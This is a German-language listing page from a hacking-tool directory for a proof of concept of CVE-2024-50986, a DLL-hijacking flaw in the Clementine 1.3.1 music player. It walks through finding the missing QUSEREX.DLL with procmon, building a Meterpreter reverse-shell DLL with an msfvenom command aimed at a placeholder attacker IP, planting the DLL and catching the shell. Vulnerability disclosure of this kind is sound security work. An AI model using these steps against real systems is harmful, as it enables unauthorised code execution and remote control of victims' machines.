Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-50986 — Ein Problem in Clementine v.1.3.1 ermöglicht es einem lokalen Angreifer, beliebigen Code über eine präparierte DLL-Datei auszuführen (DLL-Hijacking) | Kitploit
Tools/GitHubGitHub/riftsandroses/cve-2024-50986
Payload-GenerierungSchwachstellenanalyseExploitationShellcodePost-ExploitationPenetrationstestsBinary-Exploitation
GitHubriftsandroses/cve-2024-50986

CVE-2024-50986

Ein Problem in Clementine v.1.3.1 ermöglicht es einem lokalen Angreifer, beliebigen Code über eine präparierte DLL-Datei auszuführen (DLL-Hijacking)

Repository anzeigen
71vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-50986: DLL-Hijacking-Exploit für Clementine

Beschreibung: Ein Problem in Clementine v.1.3.1 ermöglicht einem lokalen Angreifer, beliebigen Code über eine manipulierte DLL-Datei auszuführen.

Betroffene Version: Clementine v.1.3.1

Forscher: Utkarsh (r1971d3) LinkedIn

NIST CVE-Link: https://nvd.nist.gov/vuln/detail/CVE-2024-50986

Sicherheitsanfälligkeitstyp: Nicht vertrauenswürdiger Suchpfad

Betroffene Komponente: QUSEREX.DLL

Proof-of-Concept Exploit

Angriffsvektor

Um diese Sicherheitslücke auszunutzen, muss ein Angreifer eine bösartige DLL namens QUSEREX.DLL erstellen und im Verzeichnis C:\Users<username>\AppData\Local\Microsoft\WindowsApps\ ablegen. Wenn die Clementine-Anwendung gestartet wird, lädt sie die bösartige DLL und führt den Code des Angreifers aus.

Beschreibung & Nutzung

  1. Verwenden Sie den Process Monitor (procmon) mit geeigneten Filtern, um fehlende DLLs zu identifizieren und zu verfolgen, wo Clementine innerhalb des Windows-Betriebssystems nach ihnen sucht

Capture_3

  1. Die Suche zeigt, dass die DLL „QUSEREX.DLL“ an mehreren Orten gesucht wird, einschließlich C:\Users<username>\AppData\Local\Microsoft\WindowsApps\

Capture_4

  1. Eine bösartige DLL wird mit msfvenom und dem folgenden Befehl erstellt:
sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL

Capture_5

  1. Diese bösartige DLL wird im Verzeichnis C:\Users<username>\AppData\Local\Microsoft\WindowsApps\ platziert, wo sie erfolgreich von Clementine geladen wird.

Capture_6

  1. Mit msfconsole wird ein gestaffelter Payload über die Reverse-Shell gesendet, was dazu führt, dass eine Meterpreter-Shell-Sitzung im Verzeichnis C:\Program Files (x86)\Clementine\projectm-presets auf dem Zielcomputer erlangt wird.

Capture_7

Capture_8

Tool herunterladen